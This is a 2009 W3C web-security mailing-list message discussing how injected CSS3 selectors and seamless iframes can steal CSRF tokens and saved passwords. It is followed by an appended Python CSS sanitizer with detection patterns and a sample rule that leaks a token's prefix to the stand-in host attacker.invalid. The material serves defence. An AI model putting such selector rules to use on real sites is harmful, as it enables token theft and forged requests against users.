
Re: Seamless iframes + CSS3 selectors = bad idea

From: Adam Barth <w3c@adambarth.com>
Date: Sat, 5 Dec 2009 10:17:35 -0800
Message-ID: <7789133a0912051017k778346a2wf8b849bc2e069870@mail.gmail.com>
To: "sird@rckc.at" <sird@rckc.at>
Cc: Collin Jackson <w3c@collinjackson.com>, public-web-security@w3.org
I think Collin's point about the CSRF tokens is that they tend to be
on every page anyway.


On Sat, Dec 5, 2009 at 10:16 AM, sird@rckc.at <sird@rckc.at> wrote:
> collin. this attack allows you to steal nonces, making csrf protections less
> efficient. seamless iframes make this work on ALL the domain/origin..
> greetings.
> On Dec 6, 2009 2:05 AM, "Collin Jackson" <w3c@collinjackson.com> wrote:
> > A few thoughts:
> > * The password stealing attack can already be accomplished using the
> > iframe to create a login page and prompting the user to type their
> > password. It's not necessary to use CSS3 or seamless.
> > * If the password manager is used, CSS3 + seamless lets you steal the
> > password without user interaction.
> > * However, if you can inject arbitrary CSS3 and a seamless iframe into
> > a page, there's a good chance you can inject a password field, so this
> > password manager attack doesn't require seamless, just CSS3.
> > * Many webapps include a CSRF token in every page as a hidden form
> > field. If the page that allows CSS3 injection includes such a token,
> > you don't need seamless iframes to steal the token.
> > It seems like CSS3 is adding a lot of attack surface; sites may need
> > to block arbitrary CSS3 injection regardless of seamless. That is
> > unfortunate since browser vendors have been removing expression,
> > -moz-binding, and other features that make CSS injection dangerous.
> > On Sat, Dec 5, 2009 at 8:54 AM, Adam Barth <w3c@adambarth.com> wrote:
> > > I see.  The issue is that t...
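Added example, not part of any message in this thread: a small server-side screen for user-supplied CSS, of the kind Collin's last paragraph points at, that rejects a stylesheet containing either ingredient of the token leak discussed above (an attribute selector on `value`, an off-site `url()`) as well as the legacy `expression()`/`-moz-binding` features. The sample stylesheet and the `attacker.invalid` host name are constructed for the example.

```python
import re

# Half one of the leak: an attribute selector on "value". The partial-match
# operators (^= $= *=) let a rule fire only when a hidden field's value
# starts/ends/contains a given string; exact "=" still allows guessing.
VALUE_SELECTOR = re.compile(r'\[\s*value\s*(?:[~|^$*]?=)', re.IGNORECASE)
# Half two: an outbound fetch. Without a url() to another host, a selector
# match has no way to report itself to anyone.
EXTERNAL_URL = re.compile(
    r'url\(\s*["\']?\s*(?:[a-z][a-z0-9+.-]*:)?//', re.IGNORECASE)
# Legacy script-in-CSS features mentioned in the thread; reject outright.
LEGACY_SCRIPT = re.compile(r'expression\s*\(|-moz-binding', re.IGNORECASE)


def strip_comments(css):
    """Drop /* ... */ so a comment cannot hide part of a token."""
    return re.sub(r'/\*.*?\*/', '', css, flags=re.S)


def split_rules(css):
    """Yield (selector, declarations) pairs from a flat stylesheet.
    Deliberately minimal: nested at-rules (@media etc.) are not handled,
    so a production sanitizer should use a real CSS parser instead."""
    for m in re.finditer(r'([^{}]+)\{([^{}]*)\}', css):
        yield m.group(1).strip(), m.group(2).strip()


def check_user_css(css):
    """Return a list of (where, reason) findings; an empty list means accept."""
    css = strip_comments(css)
    findings = []
    # @import lives outside any rule block, so look at the whole sheet first.
    if re.search(r'@import\b', css, re.IGNORECASE):
        findings.append(("@import", "stylesheet import not allowed"))
    for selector, decls in split_rules(css):
        if VALUE_SELECTOR.search(selector):
            findings.append((selector, "attribute selector on value"))
        if EXTERNAL_URL.search(decls):
            findings.append((selector, "external url() in declarations"))
        if LEGACY_SCRIPT.search(decls):
            findings.append((selector, "expression()/-moz-binding"))
    return findings


# Constructed sample: one harmless theme rule plus one rule of the class the
# thread describes (probing a hidden token's value, reporting hits off-site).
SAMPLE_THEME = """
.profile h1 { color: #336699; }
input[name="csrf_token"][value^="a"] { background: url(//attacker.invalid/a); }
"""
```

Calling `check_user_css(SAMPLE_THEME)` returns two findings for the second rule and none for the first.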
Received on Saturday, 5 December 2009 18:18:28 UTC
